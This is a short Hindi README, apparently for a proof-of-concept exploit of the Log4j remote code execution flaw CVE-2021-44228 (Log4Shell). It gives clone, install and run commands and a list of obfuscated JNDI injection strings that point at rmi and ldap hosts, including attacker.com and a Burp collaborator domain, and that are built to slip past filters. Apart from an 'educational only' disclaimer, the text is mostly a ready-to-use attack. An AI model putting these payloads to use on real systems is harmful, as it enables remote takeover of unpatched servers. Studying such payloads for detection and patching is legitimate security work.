
यह Log4j RCE अनधिकृत (CVE-2021-44228) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है।
यह Log4j RCE Unauthenticated (CVE-2021-44228) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है।
यह भेद्यता affects versions < 2.15.0।
अधिक जानकारी के लिए:
https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j
यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए बनाया गया है और इसका उपयोग कानून उल्लंघन या व्यक्तिगत लाभ के लिए नहीं किया जा सकता।
इस प्रोजेक्ट का लेखक इस प्रोजेक्ट की सामग्री से होने वाले किसी भी संभावित नुकसान के लिए ज़िम्मेदार नहीं है।

git clone https://github.com/pedrohavay/exploit-CVE-2021-44228
cd exploit-CVE-2021-44228
pip install -r requirements.txt
स्क्रिप्ट का उपयोग करें
python3 main.py
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:ldap://localhost:12345/Exploit}